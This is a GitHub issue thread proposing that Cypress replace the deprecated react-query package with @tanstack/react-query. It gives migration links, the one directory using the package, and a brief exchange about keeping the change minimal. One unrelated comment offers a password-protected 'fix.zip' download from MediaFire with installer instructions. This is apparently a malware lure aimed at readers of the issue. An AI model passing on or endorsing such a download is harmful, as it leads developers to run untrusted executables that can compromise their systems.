### ISSUE TITLE
Replace deprecated `react-query`

### ISSUE THREAD

**Issue by MikeMcC399** [cypress-io/cypress#30130]
### What would you like?

Replace the npm module [react-query](https://www.npmjs.com/package/react-query) with the recommended upgrade module [@tanstack/react-query](https://www.npmjs.com/package/@tanstack/react-query).

### Why is this needed?

Renovate marks [react-query](https://www.npmjs.com/package/react-query) as deprecated.

Motivation for enhanced functionality may come from:

- https://tanstack.com/blog/announcing-tanstack-query-v4
- https://tanstack.com/blog/announcing-tanstack-query-v5

### Other

- Renovate deprecation list https://github.com/cypress-io/cypress/issues/3777

| Item                      | Value                                                                                                                  |
| ------------------------- | ---------------------------------------------------------------------------------------------------------------------- |
| Deprecated npm module     | [react-query](https://www.npmjs.com/package/react-query)                                                               |
| npm registry message      | -                                                                                                                      |
| Other message             |                                                                                                                        |
| GitHub repo               | https://github.com/tannerlinsley/react-query                                                                           |
| Repo status               | Forwards to https://github.com/TanStack/query                                                                          |
| Replacement npm module    | https://www.npmjs.com/package/@tanstack/react-query                                                                    |
| Replacement repo          | https://github.com/TanStack/query                                                                                      |
| Replacement documentation | https://tanstack.com/query/                                                                                            |
| Migration docs            | [Migrating to React Query 4](https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-react-query-4) |
| Migration docs            | [Migrating to TanStack Query v5](https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5)        |

Where used:

| Directory                                                                                                     | Version                 |
| ------------------------------------------------------------------------------------------------------------- | ----------------------- |
| [npm/vite-plugin-cypress-esm](https://github.com/cypress-io/cypress/tree/develop/npm/vite-plugin-cypress-esm) | `"react-query": "3.39.3"` |

- [react-query](https://www.npmjs.com/package/react-query) covers versions <= `4.0.0`
- [@tanstack/react-query](https://www.npmjs.com/package/@tanstack/react-query) covers versions >= `4.0.5` <= `5.x`

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by raygdev** [comment]
@jennifer-shehane can I do this one a little later this evening? It seems easier to reason about 😅.

Tanstack query v5 requires a minimum of `18.0.0` and v4 has react v18 support with a minimum requirement of react `v16.8+`.

Should I update the react dependencies as well or use v4 of tanstack?

**Comment by jennifer-shehane** [comment]
@raygdev I would isolate the changes to be as minimal as possible for any PRs. It usually results in a quicker turnaround time.

**Comment by raygdev** [comment]
@jennifer-shehane I understand.  I'll get started on it soon.
